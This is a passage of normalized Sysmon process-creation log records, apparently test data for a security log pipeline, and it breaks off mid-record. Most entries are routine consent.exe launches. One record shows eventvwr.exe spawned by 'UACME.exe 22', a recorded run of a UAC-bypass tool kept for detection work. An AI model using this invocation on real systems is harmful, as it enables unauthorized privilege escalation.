"2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.578Z", "type": "raw", "uuid": "5c42d076-4c0d-491a-9196-39f2693106e3" } 
-{ "action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.7537753Z\"},\"EventRecordID\":\"5444\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.399\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4740\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 318 0000028064471300", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "4740", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.399Z", "type": "raw", "uuid": "2a8d15ba-ff8a-4709-b122-f4121ea80dd1" } 
-{ "action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.7215806Z\"},\"EventRecordID\":\"5443\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.350\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001027dc0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4604\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" 
\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020fbd31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3fb\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5336\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"UACME.exe 22\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020fbd31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "1627131", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", 
"object.process.guid": "747f3d96-7930-5d45-0000-001027dc0601", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "4604", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.parent.cmdline": "UACME.exe 22", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.parent.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.parent.id": "5336", "object.process.parent.name": "uacme.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "1627131", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.350Z", "type": "raw", "uuid": "46a33b2f-ec5a-47cd-b6c0-98543e66a016" }
-{ "action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:15.6646074Z\"},\"EventRecordID\":\"5442\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:15.660\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792f-5d45-0000-00103da80601}\"},{\"Name\":\"ProcessId\",\"text\":\"2388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC170\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC170", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792f-5d45-0000-00103da80601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "2388", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:15.660Z", "type": "raw", "uuid": "4e1d5f0f-b3c3-429c-9ef4-1346dd1497c0" }
-{ "action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:14.9773218Z\"},\"EventRecordID\":\"5441\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:14.972\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792e-5d45-0000-00104a760601}\"},{\"Name\":\"ProcessId\",\"text\":\"8072\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC890\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC890", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792e-5d45-0000-00104a760601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "8072", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:14.972Z", "type": "raw", "uuid": "e547ebd6-7c5c-43f5-976a-3338e6f9d1e8" }
-{ "action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:14.3727351Z\"},\"EventRecordID\":\"5440\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:14.368\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792e-5d45-0000-001001560601}\"},{\"Name\":\"ProcessId\",\"text\":\"6716\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC9C0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC9C0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792e-5d45-0000-001001560601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "6716", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:14.368Z", "type": "raw", "uuid": "15801084-49e4-410f-8731-2d4fc0090ea9" }
-{ "action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.8748883Z\"},\"EventRecordID\":\"5439\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.760\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00107a250601}\"},{\"Name\":\"ProcessId\",\"text\":\"7472\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC3D0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": 